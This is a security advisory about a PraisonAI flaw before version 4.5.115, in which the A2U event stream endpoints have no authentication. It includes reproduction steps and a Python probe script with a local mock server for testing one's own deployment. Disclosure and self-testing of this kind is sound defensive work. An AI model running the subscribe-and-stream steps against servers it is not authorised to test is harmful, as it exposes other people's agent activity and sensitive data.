PraisonAI Unauthenticated Event Stream Vulnerability in A2U Server

Vulnerability

A vulnerability exists in PraisonAI versions prior to 4.5.115, where the A2U (Agent-to-User) event stream server exposes all agent activity without authentication. The create_a2u_routes() function registers the endpoints /a2u/info, /a2u/subscribe, /a2u/events/{stream_name}, /a2u/events/sub/{id}, and /a2u/health without any authentication check. As a result, anyone who can reach the server over the network can subscribe to event streams and receive real-time updates of all agent activity, including agent responses, tool usage, and internal reasoning, which exposes potentially sensitive data to unauthenticated attackers.

Impact

Exploitation of this vulnerability allows for the unauthorized subscription to A2U event streams, with real-time access to all agent events, including responses, tool call details, and internal reasoning.

Reproduction

To reproduce this vulnerability, send an HTTP POST request to the /a2u/subscribe endpoint without any authentication token. The response contains a subscription_id. Then request the /a2u/events/sub/{id} endpoint with that subscription_id; the server streams all agent events live, including responses, tool calls, and the agent's thought process.
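The two-step flow above, written as a probe a defender can run against their own deployment. This is an added example, not PraisonAI code: the mock server it ships with is a constructed stand-in that only copies the two endpoint names from this advisory, and its event format (SSE "data:" lines), the Authorization bearer-token scheme, and the MOCK_TOKEN value are assumptions made so the example runs offline. Against a real server, point assess() at the A2U base URL instead of the mock.

```python
"""Probe an A2U-style server for the unauthenticated subscribe/stream flow.

Added example, not PraisonAI code. The mock server below is a constructed
stand-in that only copies the two endpoint names from the advisory; its
SSE "data:" event format and bearer-token check are assumptions.
"""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from uuid import uuid4

MOCK_TOKEN = "constructed-example-token"  # constructed value, not a real credential


def _request(url, method="GET", token=None, timeout=5):
    req = urllib.request.Request(url, data=b"{}" if method == "POST" else None,
                                 method=method,
                                 headers={"Content-Type": "application/json"})
    if token:
        req.add_header("Authorization", f"Bearer {token}")  # assumed auth scheme
    return urllib.request.urlopen(req, timeout=timeout)


def subscribe(base_url, token=None):
    """Step 1 of the advisory: POST /a2u/subscribe -> (status, subscription_id)."""
    try:
        with _request(f"{base_url.rstrip('/')}/a2u/subscribe", "POST", token) as resp:
            return resp.status, json.loads(resp.read() or b"{}").get("subscription_id")
    except urllib.error.HTTPError as err:
        return err.code, None


def read_first_event(base_url, sub_id, token=None):
    """Step 2: GET /a2u/events/sub/{id} -> (status, first parsed event or None)."""
    try:
        with _request(f"{base_url.rstrip('/')}/a2u/events/sub/{sub_id}", "GET", token) as resp:
            for raw in resp:  # read the stream line by line, stop at the first event
                line = raw.decode().strip()
                if line.startswith("data:"):
                    return resp.status, json.loads(line[len("data:"):].strip())
            return resp.status, None
    except urllib.error.HTTPError as err:
        return err.code, None


def assess(base_url):
    """Run both steps with no token. 'vulnerable' is True only when the whole
    unauthenticated chain (subscribe, then stream an event) succeeds."""
    sub_status, sub_id = subscribe(base_url)
    ev_status, event = read_first_event(base_url, sub_id) if sub_id else (None, None)
    return {"subscribe_status": sub_status, "events_status": ev_status,
            "vulnerable": sub_status == 200 and sub_id is not None
                          and ev_status == 200 and event is not None}


class MockA2UHandler(BaseHTTPRequestHandler):
    """Constructed stand-in. require_token=False mirrors the pre-4.5.115
    behaviour described in the advisory; True models a token-checking server."""
    require_token = False

    def _authorized(self):
        return (not self.require_token
                or self.headers.get("Authorization") == f"Bearer {MOCK_TOKEN}")

    def _send(self, status, body, ctype):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain body
        if self.path != "/a2u/subscribe":
            return self.send_error(404)
        if not self._authorized():
            return self.send_error(401)
        self._send(200, json.dumps({"subscription_id": str(uuid4())}).encode(),
                   "application/json")

    def do_GET(self):
        if not self.path.startswith("/a2u/events/sub/"):
            return self.send_error(404)
        if not self._authorized():
            return self.send_error(401)
        event = {"type": "agent.response", "content": "constructed sample event"}
        self._send(200, f"data: {json.dumps(event)}\n\n".encode(), "text/event-stream")

    def log_message(self, *_):  # keep the demo output quiet
        pass


def start_mock(require_token):
    """Start a mock server on a free loopback port; returns (server, base_url)."""
    handler = type("Handler", (MockA2UHandler,), {"require_token": require_token})
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    for require_token in (False, True):
        server, url = start_mock(require_token)
        print("token required:" if require_token else "no auth:", assess(url))
        server.shutdown()
```

assess() deliberately requires both steps to succeed before reporting the server as exposed: a 200 on /a2u/subscribe alone could be a server that hands out ids but still gates the stream, so the probe reads one event from /a2u/events/sub/{id} as well. The hardened mock returns 401 on the first step, which is what a patched deployment should show when probed without a token.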

Remediation

Upgrade to PraisonAI version 4.5.115 or later, which adds authentication to the A2U routes. Until the upgrade is applied, do not expose the A2U server to untrusted networks.

Added: Apr 8, 2026, 10:00 PM
Updated: Apr 8, 2026, 10:00 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 8.7
remediation: 0.0
relevance: 5.5
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.